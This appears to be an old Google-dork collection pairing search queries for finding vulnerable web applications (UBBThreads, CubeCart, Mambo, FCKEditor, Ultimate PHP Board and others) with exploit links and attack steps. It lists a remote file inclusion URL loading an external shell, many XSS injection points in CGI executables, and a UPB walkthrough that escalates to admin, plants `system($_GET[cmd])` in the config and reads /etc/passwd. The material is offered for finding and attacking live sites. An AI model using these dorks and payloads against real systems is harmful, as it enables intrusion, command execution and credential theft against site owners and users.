forums powered by ubbthreads are vulnerable to file inclusion. You can get more results with yahoo search. http://site.com/ubbthredspath//ubbt.inc.php?thispath=http://shell.txt? http://www.securityfocus.com/archive/1/archive/1/435288/100/0/threaded

Google Search: “powered by ubbthreads”

Active PHP Bookmarks, a web based bookmark manager, was originally developed by Brandon Stone. Due to lack of time he has withdrawn himself from the project, however keeping his development forum on-line. On December 3rd 2004 this APB-forum, which was still the home of a small but relatively active community, was compromised. All content of the forum was lost, including links to important user contributed patches for the APB code. exploit (i haven’t tested it) http://www.securityfocus.com/archive/1/305392 my version of exploit http://fr0zen.no-ip.org/apbn-0.2.5_remote_incl_xpl.phps

Google Search: “powered by active php bookmarks” | inurl:bookmarks/view_group.php?id=

this is for PHPList 2.10.2 arbitrary local inclusion, discovered by me: advisory/poc exploit: http://retrogod.altervista.org/phplist_2102_incl_xpl.html

Google Search: “powered by phplist” | inurl:”lists/?p=subscribe” | inurl:”lists/index.php?p=subscribe” -ubbi -bugs +phplist -tincan.co.uk

a cgi-bin executables xss/html injection miscellanea: some examples: inurl:keycgi.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/keycgi.exe?cmd=download&product=”>[XSS HERE] inurl:wa.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/wa.exe?SUBED1=”>[XSS HERE] inurl:mqinterconnect.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/mqinterconnect.exe?poi1iconid=11111&poi1streetaddress=”>[XSS HERE]&poi1city=city&poi1state=OK inurl:as_web.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/as_web.exe?[XSS HERE]+B+wishes inurl:webplus.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webplus.exe?script=”>[XSS HERE] inurl:odb-get.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/odb-get.exe?WIT_template=”>[XSS HERE]&WIT_oid=what::what::1111&m=1&d= inurl:hcapstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/hcapstat.exe?CID=”>[XSS HERE]&GID=&START=110&SBN=OFF&ACTION=Submit inurl:webstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webstat.exe?A=X&RE=”>[XSS HERE] inurl:cows.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/cows/cows.exe?cgi_action=tblBody&sort_by=”>[XSS HERE] inurl:findifile.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/findfile.exe?SEEKER=”>[XSS HERE]&LIMIT=50&YEAR=”> inurl:baserun.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/baserun.exe?_cfg=”>[XSS HERE] inurl:Users.exe ext:exe inurl:/*cgi*/ html injection: http://[target]/[path]/cgi-bin/Users.exe?SITEID=[html][XSS HERE]&page=1 inurl:webstat.exe ext:exe inurl:/*cgi*/ http://[target]/[path]/webstat.exe?A=X&RA=[XSS HERE]

Google Search: inurl:*.exe ext:exe inurl:/*cgi*/

intitle:admbook intitle:version filetype:php tested version: 1.2.2, you can inject php code in config-data.php and execute commands on target through X-FOWARDED FOR http header when you post a message also you can see phpinfo(): http://[target]/[path]/admin/info.php perl exploit: http://retrogod.altervista.org/admbook_122_xpl.html

Google Search: intitle:admbook intitle:version filetype:php

this is for Linpha <=1.0 arbitrary local inclusion: http://retrogod.altervista.org/linpha_10_local.html intext:”LinPHA Version” intext:”Have fun” to see version in description in Linpha 0.9 branch there is sql injection through cookies also to bypass admin login, search for exploit

Google Search: intext:”LinPHA Version” intext:”Have fun”

“index of” intext:fckeditor inurl:fckeditor this dork is for FCKEditor script through editor/filemanager/browser/default/connectors/connector.php script a user can upload malicious contempt on target machine including php code and launch commands… however if you do not succeed to execute the shell, FCKEditor is integrated in a lot of applications, you can check for a local inclusion issue inside of them… this tool make the dirty work for 2.0 – 2.2 versions: http://retrogod.altervista.org/fckeditor_22_xpl.html
Google Search: “index of” intext:fckeditor inurl:fckeditor

Gtchat install file. You can disable the chat program or change the language without a admin username or password. You can also point the chatroom information to a different URL in theory using a crosscript to take over the the chatroom.

Google Search: inurl:install.pl intitle:GTchat

PHPGedView <=3.3.7 remote code execution advisory & poc exploit: http://rgod.altervista.org/phpgedview_337_xpl.html

Google Search: intext:”PhpGedView Version” intext:”final – index” -inurl:demo

CubeCart is an eCommerce script written with PHP & MySQL. Search CubeCart 3.0.6 portal vulnerable. The vulnerability is Remote Command Execution. See http://milw0rm.com/id.php?id=1398 Moderator note: “Moving milw0rm once again. This time hosted by asylum-networks.com. /str0ke”

Google Search: intext:”Powered by CubeCart 3.0.6″ intitle:”Powered by CubeCart”

this is the dork for Limbo Cms <= 1.0.4.2 _SERVER[] overwrite / remote code execution advisory & poc exploit: http://rgod.altervista.org/limbo1042_xpl.html

Google Search: “Site powered By Limbo CMS”

Vulnerability Description SimpleBBS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search module not properly sanitizing user-supplied input to undisclosed variables. This may allow an attacker to inject or manipulate SQL queries in the backend database. No further details have been provided. Solution Description Currently, there are no known upgrades, patches, or workarounds available to correct this issue. Products: * SimpleMedia SimpleBBS 1.1 Affected Vulnerability classification: * Remote vulnerability * Input manipulation attack * Impact on integrity * Exploit unavailable * Verified More info on Vuln: http://www.securityfocus.com/bid/15594

Google Search: intext:”Powered by SimpleBBS v1.1″*

PhpCOIN 1.2.2 arbitrary remote\local inclusion / blind sql injection / path disclosure advisory: http://rgod.altervista.org/phpcoin122.html more generic: “Powered By phpCOIN” to see previous verions (not tested)

Google Search: “Powered By phpCOIN 1.2.2″

this is the dork for Sugar Suite 3.5.2a & 4.0beta remote code execution issue, advisory & poc exploit: http://rgod.altervista.org/sugar_suite_40beta.html

Google Search: “2005 SugarCRM Inc. All Rights Reserved” “Powered By SugarCRM”

advisory & poc exploit: http://rgod.altervista.org/docebo204_xpl.html
Google Search: “Based on DoceboLMS 2.0″

This is the dork for PhpX <= 3.5.9 Sql injection /login bypass vulnerability advisory & poc exploit: http://rgod.altervista.org/phpx_359_xpl.html

Google Search: “This website powered by PHPX” -demo

Xaraya <=1.0.0 RC4 Denial of Service explaination: http://rgod.altervista.org/xarayaDOS.html exploit: http://rgod.altervista.org/xarayaDOS_xpl.html

Google Search: “Powered by Xaraya” “Copyright 2005″

Guppy <= 4.5.9 $REMOTE_ADDR overwrite -> remote code execution / various arbitrary inclusion issues advisory & poc exploit: http://rgod.altervista.org/guppy459_xpl.html

Google Search: “powered by GuppY v4″|”Site créé avec GuppY v4″

dork: “Powered by UPB” (b 1.0)|(1.0 final)|(Public Beta 1.0b) this is a very old vulnerability discovered by Xanthic, can’t find it in GHDB and I am surprised of how it still works… register, login, go to: http://[target]/[path_to_upb]/admin_members.php edit your level to 3 (Admin) and some Admin level to 1 (user), logout, re-login and… boom! You see Admin Panel link as I see it? The only link to the advisory that I found is this (in Italian): http://216.239.59.104/search?q=cache:iPdFzkDyS5kJ:www.mojodo.it/mjdzine/zina/numero3/n3f1.txt+xanthic+upb&hl=it and I have remote commads xctn for this now, edit site title with this code: Ultimate PHP Board”; error_reporting(0); ini_set(“max_execution_time”,0); system($_GET[cmd]); echo ” now in config.dat we have: … $title=”Ultimate PHP Board “; error_reporting(0); ini_set(“max_execution_time”,0); system($_GET[cmd]); echo ” “; … in header.php we have: … include “./db/config.dat”; … so you can launch commands: http://[target]/[path]/header.php?cmd=cat%20/etc/passwd

Google Search: “Powered by UPB” (b 1.0)|(1.0 final)|(Public Beta 1.0b)

This dork is for Mambo 4.5.2x Globals overwrite / remote command execution exploit: http://rgod.altervista.org/mambo452_xpl.html

Google Search: “Copyright 2000 – 2005 Miro International Pty Ltd. All rights reserved” “Mambo is Free Software released”